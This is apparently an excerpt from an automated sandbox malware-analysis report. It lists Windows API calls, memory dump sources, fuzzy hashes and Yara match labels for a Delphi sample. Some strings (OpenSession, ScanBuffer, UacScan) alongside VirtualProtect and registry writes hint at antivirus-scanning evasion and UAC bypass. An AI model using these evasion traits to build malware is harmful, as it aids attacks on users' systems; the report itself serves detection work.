• Sleep.KERNEL32(00000000,?), ref: 02D61B17
• Sleep.KERNEL32(0000000A,00000000,?), ref: 02D61B31
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 0f1619fd48173781fe9ea775b504fb2219e030c07daa49aa2224ae51dd2a5383
• Instruction ID: 77760b087c553d19214a3eaaf14d33ba5fc2444ea177d6b481a01417e2c20954
• Opcode Fuzzy Hash: 0f1619fd48173781fe9ea775b504fb2219e030c07daa49aa2224ae51dd2a5383
• Instruction Fuzzy Hash: B2518B71A052428FE715CF6CC989766BBE0EB46314F2885AED84CCB386E760DC45CBA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D7C9EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 28da0740028b82f600e91f98e8e3ca18b83bfcaeade9b4dc9d7c48ef695d7cc6
• Instruction ID: 62391fdca6de0c1469aa3946fdea02e7dadf15822fec31985d38a66103fbffe6
• Opcode Fuzzy Hash: 28da0740028b82f600e91f98e8e3ca18b83bfcaeade9b4dc9d7c48ef695d7cc6
• Instruction Fuzzy Hash: 52410031B642499FEB20EBA4D855EEEB3F6EF88715F604436E041B7350EA74AD058F60
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D75D30,?,?,02D738BC,00000001), ref: 02D75C44
• GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D75D30,?,?,02D738BC,00000001), ref: 02D75C72
  • Part of subcall function 02D67D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02D738BC,02D75CB2,00000000,02D75D30,?,?,02D738BC), ref: 02D67D66
  • Part of subcall function 02D67F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02D738BC,02D75CCD,00000000,02D75D30,?,?,02D738BC,00000001), ref: 02D67F73
• GetLastError.KERNEL32(00000000,02D75D30,?,?,02D738BC,00000001), ref: 02D75CD7
  • Part of subcall function 02D6A734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02D6C395,00000000,02D6C3EF), ref: 02D6A753
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: CreateErrorFileLast$FormatFullMessageNamePath
• String ID:
• API String ID: 503785936-0
• Opcode ID: 534aaf02d7a7f829e339f4c42c8ff28e697c840a5b24c5b6a3c81630ef6dcd45
• Instruction ID: 94cd8299d61e8f0b2ff815289e39b8d9dfd1b99f70b515ffac4d1057c6ac9abc
• Opcode Fuzzy Hash: 534aaf02d7a7f829e339f4c42c8ff28e697c840a5b24c5b6a3c81630ef6dcd45
• Instruction Fuzzy Hash: BC317330A046489FEB00DFA4D885BADBBB6EF48714F908565D904A7380E7799D05CFB2
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02DC5798), ref: 02D7D35C
• RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D394
• RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D39F
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: c248a9a90fde8834302ce0fd7d5a5239432cb3d0b034ab2b0493d5d2ffc3477d
• Instruction ID: 576c34ea6207e3daf718e52a752d136d067985c7c7080e0bcea220359c87aefc
• Opcode Fuzzy Hash: c248a9a90fde8834302ce0fd7d5a5239432cb3d0b034ab2b0493d5d2ffc3477d
• Instruction Fuzzy Hash: E211FB70640205AFEB10EB68D895A6E77EDEB09310F90446AF508E7790EB34ED558F60
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02DC5798), ref: 02D7D35C
• RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D394
• RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D39F
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: 4ad8e3527b11b7647d20bc26781c9e20f3d790bbd5418f03217be9f59ba4a57b
• Instruction ID: e67ec65cc44ed1d8fa7d00347d25e761df44c76fb329f61434e0b252bffa6f26
• Opcode Fuzzy Hash: 4ad8e3527b11b7647d20bc26781c9e20f3d790bbd5418f03217be9f59ba4a57b
• Instruction Fuzzy Hash: 73110D70640205AFEB10EF68D895A6E77EDEB09310F90446AF508E7790DB34ED558F70
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
• GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
• GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
  • Part of subcall function 02D77B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02D77BA5,?,?,00000000,00000000), ref: 02D77B61
  • Part of subcall function 02D77B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02D77B67
  • Part of subcall function 02D77B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02D77BA5,?,?,00000000,00000000), ref: 02D77B81
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
• String ID:
• API String ID: 2543409266-0
• Opcode ID: 07fdc532f3642d860c7661d158b66e792f8a637bd0f199954039d0cbbb09b223
• Instruction ID: 349921c01880cdf501f7f9cc305e0b9da9ae2bb78c84858530fe5cad5dd690c7
• Opcode Fuzzy Hash: 07fdc532f3642d860c7661d158b66e792f8a637bd0f199954039d0cbbb09b223
• Instruction Fuzzy Hash: 15019670640245AFF704EBA4EC55A2EB7A9EB48300FE00465A55AF7740EA78FD008FB4
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 640e0d541b22457bc2685fc9f274b17a38e7e76509dd6bb5aebb368a5b5931d7
• Instruction ID: e9e0a539a38b5cdffc3a54a6acaee885f277c49c6d45ccb3afb6e1159a9f28bc
• Opcode Fuzzy Hash: 640e0d541b22457bc2685fc9f274b17a38e7e76509dd6bb5aebb368a5b5931d7
• Instruction Fuzzy Hash: 02F0AF287041108BC7106B38C98CEBE2B9AEF51312F585422A4C65B395DB24CC05CA72
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
• SysAllocStringLen.OLEAUT32(?,?), ref: 02D64D1F
• SysFreeString.OLEAUT32(00000000), ref: 02D64D31
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
• Opcode ID: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
• Instruction ID: 4244515e7a06aa9be465a565b7349f64582eca0bfd3ddb1755a5d4dea0b3b01e
• Opcode Fuzzy Hash: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
• Instruction Fuzzy Hash: 0BE012B81052015FEB252F208D4DF3B336AEFD5745F598499A804CA350DB34CC41EE74
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(?), ref: 02D77396
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
• Opcode ID: 44c3f3d62747514d565a36d171d49a870abb22e11b986a741dfbe3de2c83a809
• Instruction ID: 0b02dd9daf76f5b25bc34d90e8d239829b81f7473cfe039b01b07d016cbc5d22
• Opcode Fuzzy Hash: 44c3f3d62747514d565a36d171d49a870abb22e11b986a741dfbe3de2c83a809
• Instruction Fuzzy Hash: 5CB1D274A016099FEB10CF98D880AADFBF2FF49314F248969E855AB364E734AC45CF50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VariantCopy.OLEAUT32(00000000,00000000), ref: 02D6E73D
  • Part of subcall function 02D6E320: VariantClear.OLEAUT32(?), ref: 02D6E32F
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: Variant$ClearCopy
• String ID:
• API String ID: 274517740-0
• Opcode ID: 0abe89dd3e121fa99964b8ac705524023e772d8533534b3d5ac632af7c600462
• Instruction ID: a4eea43e5e7eec6385e2de35f0c4369083395d126dafb5d166e8d9e723ef8b2b
• Opcode Fuzzy Hash: 0abe89dd3e121fa99964b8ac705524023e772d8533534b3d5ac632af7c600462
• Instruction Fuzzy Hash: C011A1387006509BD720AF28C9CCE7767EAEF85B50B149466E68A8B355DB31DC41CAB2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
• Opcode ID: 77a9d7ce770d052951130d65bf9a5d8ff7a6551586c980461d8c49f416c2e6ee
• Instruction ID: 7a59035e67a982cb038bf47d49a9244355afb61e414073752679dfe31e088262
• Opcode Fuzzy Hash: 77a9d7ce770d052951130d65bf9a5d8ff7a6551586c980461d8c49f416c2e6ee
• Instruction Fuzzy Hash: 9E314D79A04209AFEB10DEA8D88CEBAB7E8EB0C314F444561E905D7B40D334ED50CB61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,02D76D75,?,?,?,00000000), ref: 02D76D55
  • Part of subcall function 02D64C24: SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
• Opcode ID: 248c82937b9cb2a3a8d15c6a8403b566241f5084185eac490e0c78c768fffc84
• Instruction ID: 787ca99b99435a081e5b43cdd6caba303a4bbed581dab5881d900e1431f36e3a
• Opcode Fuzzy Hash: 248c82937b9cb2a3a8d15c6a8403b566241f5084185eac490e0c78c768fffc84
• Instruction Fuzzy Hash: 30E06571614A047FE715EA72DC5596A77EDDB49710F620471A80093700F9759E048DB5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(02D60000,?,00000105), ref: 02D6584A
  • Part of subcall function 02D65A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D60000,02D8B790), ref: 02D65AAC
  • Part of subcall function 02D65A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D60000,02D8B790), ref: 02D65ACA
  • Part of subcall function 02D65A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D60000,02D8B790), ref: 02D65AE8
  • Part of subcall function 02D65A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D65B06
  • Part of subcall function 02D65A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D65B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D65B4F
  • Part of subcall function 02D65A90: RegQueryValueExA.ADVAPI32(?,02D65CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D65B95,?,80000001), ref: 02D65B6D
  • Part of subcall function 02D65A90: RegCloseKey.ADVAPI32(?,02D65B9C,00000000,?,?,00000000,02D65B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D65B8F
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
• Instruction ID: d1a42ee39d8f65d1425a82f6e77e0f3d559cd5c29acb2d933c3873911a8c19f3
• Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
• Instruction Fuzzy Hash: 65E06D71A002148BCB10DE5898C4A6633D8AB08754F840961EC58CF346D371DD548BE0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D67DB0
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
• Instruction ID: 4f7f0dd44e264992265401d4dc93a286f674a0f3cb057235a93e077e3da80fa2
• Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
• Instruction Fuzzy Hash: 1FD05BB23091507BE220955B6C44EB75BDDCBC9771F10067DB568C3280D720CC01C6B1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,?,02D7E0EE,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,UacInitialize), ref: 02D67E23
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 951039ecee422536e3dea04a53b9578876d15029f98b4fa6b434c683e6939a5b
• Instruction ID: 7997b5d7ee45f11b30ee913ae643d1d7b1e9bf9944e9108bb2cbfa3104b668fd
• Opcode Fuzzy Hash: 951039ecee422536e3dea04a53b9578876d15029f98b4fa6b434c683e6939a5b
• Instruction Fuzzy Hash: 3AC08CA1202301077A6061FC1CCC13A8288C94413C7240B7AF028D63E2D325CC5AA8B0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,?,02D81133,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,ScanString), ref: 02D67E47
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 3fca3ef7285960aff002ce6aaf6464954507beed463b747c503eea14233f1ce8
• Instruction ID: f6e01d227f964198d6ad6cd0d6776d8b313f1cb219e0b48a064d23ad71a7b772
• Opcode Fuzzy Hash: 3fca3ef7285960aff002ce6aaf6464954507beed463b747c503eea14233f1ce8
• Instruction Fuzzy Hash: 82C08CA060230A0F7E6062FC2CCC3B9828AC94413CB201B66E028E63D2D316DC6A6830
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
• SysReAllocStringLen.OLEAUT32(02D89E50,02D7D42C,00000016), ref: 02D64C7A
Memory Dump Source
• Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
• Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
Similarity
• API ID: String$AllocFree
• String ID:
• API String ID: 344208780-0
• Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
• Instruction ID: 327eb52f47fd56ab1e507a5060800b6cc4d82ed2a10f136feedcb925960a408f
• Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
• Instruction Fuzzy Hash: 10D080741001025F9F3CD6198A0D93761AFDDE034F74ECA5D98024A340E761CC00DE35
Uniqueness
• Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID:
                                                                                        • API String ID: 3341692771-0
                                                                                        • Opcode ID: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                        • Instruction ID: 904e91447aec64527718dfb16fa50df56871f8e38c03591d2e6d351fb34150b5
                                                                                        • Opcode Fuzzy Hash: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                        • Instruction Fuzzy Hash: 9AC012A26402204BEF359AA8ACC8BA662CDDB092A9F1940A1E518DB340E760DC10CAB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • timeSetEvent.WINMM(00002710,00000000,02D89B30,00000000,00000001), ref: 02D89B4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Eventtime
                                                                                        • String ID:
                                                                                        • API String ID: 2982266575-0
                                                                                        • Opcode ID: a8219cda056f842b4098c733d0361f53bc46904d3749f4f51ebb05d3126cb7af
                                                                                        • Instruction ID: 8de1d26668cc76e9f8c4774486aa26d8893628e30bc002ad05b2fe7305627040
                                                                                        • Opcode Fuzzy Hash: a8219cda056f842b4098c733d0361f53bc46904d3749f4f51ebb05d3126cb7af
                                                                                        • Instruction Fuzzy Hash: CDC048B17A1341AAF610AAA42DE6FB3168ED704B00FA00812B645AE3C1D5E2AC105A64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02D64C03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 2525500382-0
                                                                                        • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                        • Instruction ID: 7fa9654c619dc1b8c4e340c417ac5ddaa9d4dca084bfad01a57dfb202b2682f5
                                                                                        • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                        • Instruction Fuzzy Hash: A6B012382082021BFA7412220F0D732004D4FA13CDF8800519E58C83C0FB01CC11CC3A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02D64C1B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID:
                                                                                        • API String ID: 3341692771-0
                                                                                        • Opcode ID: 98a5ded0fdb0df2e5a062e13461102ebbb408f0f94918d0aa90ba91e9420b17a
                                                                                        • Instruction ID: df6f6aaff14e4aab3e3bebcf6821c9bba13ad9841365e76f1852ef70f2e303aa
                                                                                        • Opcode Fuzzy Hash: 98a5ded0fdb0df2e5a062e13461102ebbb408f0f94918d0aa90ba91e9420b17a
                                                                                        • Instruction Fuzzy Hash: 70A011A80002020B8A2A222A002823A2023AECA200B8AC8A802008A300CA2A8800A8B8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02D61A03,?,02D62000), ref: 02D615E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 7583d7255f222449d09a77f71fb5057381d428de0b4abce32f24faab32279f3d
                                                                                        • Instruction ID: 9c71fcc7b7aabd638fed9fb24b0bfc38f9f7e88ab704ee8f96525dc3f3bc6294
                                                                                        • Opcode Fuzzy Hash: 7583d7255f222449d09a77f71fb5057381d428de0b4abce32f24faab32279f3d
                                                                                        • Instruction Fuzzy Hash: FBF06DF0B413028FDB06CF7999893117BE2E789348F20857DDA09DB3D8EB7188058B10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02D62000), ref: 02D616A4
